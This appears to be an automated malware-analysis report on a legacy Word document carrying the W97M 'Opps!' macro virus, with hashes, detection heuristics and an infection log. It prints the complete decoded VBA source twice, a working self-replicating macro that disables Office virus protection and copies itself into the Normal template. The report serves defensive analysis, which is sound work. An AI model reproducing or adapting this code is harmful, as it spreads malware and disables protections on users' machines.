Office (OLE) malware analysis — malicious · e5122156a3c971a7

MALICIOUS

Office (OLE)

35.5 KB Created: 2000-04-26 10:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: ad0ae8303a4b1c3603019ce019b26457 SHA-1: 2bcf67b5ac230297ae1db17a7d857c63ba22d0b8 SHA-256: e5122156a3c971a7bbbf858e5d4f0e680c3fdd395c77387ab271203a66c2aeb6

188 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing a VBA macro with an AutoOpen subroutine. This macro attempts to disable virus protection and replicate its code into the Normal template and the active document. The macro also modifies a subroutine name to 'ToolsMacro', which is a known technique for legacy macro viruses to achieve persistence or spread. The presence of 'AutoOpen' and the replication logic strongly suggests a macro-based malware designed for propagation.

Heuristics 5

ClamAV: Doc.Trojan.Class-43 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Class-43
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2726 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2726 bytes
SHA-256: `c27cd4f24c0b46629639ae3806351062de393aed9cc92f37b88459b4b9e17656`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() 'Opps! On Error GoTo Out Options.VirusProtection = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) = "'Opps!" Then NoTe = True Else NoTe = False If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) = "'Opps!" Then AcWi = True Else AcWi = False If AcWi = True And NoTe = False Then Set Source = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule Set Destin = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule Linea1 = "Sub Auto" & "Close()" LineaX = "Sub ToolsMacro()" Else If AcWi = False And NoTe = True Then Set Source = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule Set Destin = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule Linea1 = "Sub Auto" & "Open()" LineaX = "Sub ViewVBCode()" Else GoTo Out End If End If Destin.DeleteLines 1, Destin.CountOfLines Destin.InsertLines 1, Linea1 For I = 2 To Source.CountOfLines Destin.InsertLines I, Source.Lines(I, 1) Next I Destin.Replaceline 35, LineaX Destin.InsertLines (Source.CountOfLines + 1), "'" & Application.UserName & " " & Now & " " & ActiveDocument.FullName ActiveDocument.SaveAs FileName:=ActiveDocument.FullName Out: If Day(Now) = 30 And Month(Now) = 12 Then MsgBox "lA-cOsA tE eSPiA!", 0, "Opps!" End Sub Sub ViewVBCode() End Sub 'Start Opps! in the World 16/10/99 00:00:00 p.m. - 'Dra. Taratuto 1/01/97 0:53:47 A:\opps.doc 'Dra. Taratuto 2/03/2000 0:05:52 Document2 'USER10 7/03/2000 14:16:18 A:\Document2.doc 'USER10 8/03/2000 11:17:27 A:\www.doc 'OPEN NAUTAS 08/03/2000 11:18:01 A:\www.doc 'OPEN NAUTAS 11/03/2000 1:21:50 A:\REJUNTE.doc 'CIMADRID 14/03/2000 14:22:55 A:\REJUNTE.doc 'CIMADRID 14/03/2000 14:42:15 C:\Mis documentos\Indonesian Project.doc 'CIMADRID 14/03/2000 14:55:58 C:\Mis documentos\Indonesian Project.doc 'CIMADRID 14/03/2000 15:26:01 C:\Mis documentos\INDONESIA DANY.doc 'belen-r 14/03/00 18:16:17 C:\JSarte Indonesia\INDONESIA DANY MARCH 14.doc 'belen-r 16/03/00 16:46:00 U:\ANGELES\Lazagha.doc 'Mª de los Angeles Gil 16/03/00 16:46:27 U:\ANGELES\LAZAGHA.DOC 'Mª de los Angeles Gil 22/03/00 10:30:27 \\KATTY\SYS\USUARIOS\EDUCA\ANGELES\THAILAND.DOC 'GOAT 22/01/2000 2:58:29 PM C:\Virus\THAILAND.DOC 'Ditry PC 4/26/2000 11:56:03 AM C:\NV\W97MLACO.DT 'Ditry PC 4/26/2000 11:56:16 AM C:\NV\sample1.doc

SHA-256: c27cd4f24c0b46629639ae3806351062de393aed9cc92f37b88459b4b9e17656

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'Opps!
On Error GoTo Out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) = "'Opps!" Then NoTe = True Else NoTe = False
If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) = "'Opps!" Then AcWi = True Else AcWi = False
If AcWi = True And NoTe = False Then
    Set Source = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Set Destin = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    Linea1 = "Sub Auto" & "Close()"
    LineaX = "Sub ToolsMacro()"
Else
    If AcWi = False And NoTe = True Then
        Set Source = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
        Set Destin = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
        Linea1 = "Sub Auto" & "Open()"
        LineaX = "Sub ViewVBCode()"
    Else
        GoTo Out
    End If
End If
Destin.DeleteLines 1, Destin.CountOfLines
Destin.InsertLines 1, Linea1
For I = 2 To Source.CountOfLines
    Destin.InsertLines I, Source.Lines(I, 1)
Next I
Destin.Replaceline 35, LineaX
Destin.InsertLines (Source.CountOfLines + 1), "'" & Application.UserName & " " & Now & " " & ActiveDocument.FullName
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Out:
If Day(Now) = 30 And Month(Now) = 12 Then MsgBox "lA-cOsA tE eSPiA!", 0, "Opps!"
End Sub
Sub ViewVBCode()
End Sub
'Start Opps! in the World 16/10/99 00:00:00 p.m. -

'Dra. Taratuto 1/01/97 0:53:47 A:\opps.doc
'Dra. Taratuto 2/03/2000 0:05:52 Document2
'USER10 7/03/2000 14:16:18 A:\Document2.doc
'USER10 8/03/2000 11:17:27 A:\www.doc
'OPEN NAUTAS 08/03/2000 11:18:01 A:\www.doc
'OPEN NAUTAS 11/03/2000 1:21:50 A:\REJUNTE.doc
'CIMADRID 14/03/2000 14:22:55 A:\REJUNTE.doc
'CIMADRID 14/03/2000 14:42:15 C:\Mis documentos\Indonesian Project.doc
'CIMADRID 14/03/2000 14:55:58 C:\Mis documentos\Indonesian Project.doc
'CIMADRID 14/03/2000 15:26:01 C:\Mis documentos\INDONESIA DANY.doc
'belen-r 14/03/00 18:16:17 C:\JSarte Indonesia\INDONESIA DANY MARCH 14.doc
'belen-r 16/03/00 16:46:00 U:\ANGELES\Lazagha.doc
'Mª de los Angeles Gil 16/03/00 16:46:27 U:\ANGELES\LAZAGHA.DOC
'Mª de los Angeles Gil 22/03/00 10:30:27 \\KATTY\SYS\USUARIOS\EDUCA\ANGELES\THAILAND.DOC
'GOAT 22/01/2000 2:58:29 PM C:\Virus\THAILAND.DOC
'Ditry PC 4/26/2000 11:56:03 AM C:\NV\W97MLACO.DT
'Ditry PC 4/26/2000 11:56:16 AM C:\NV\sample1.doc

Open this report in the interactive analyzer, or submit your own file for analysis.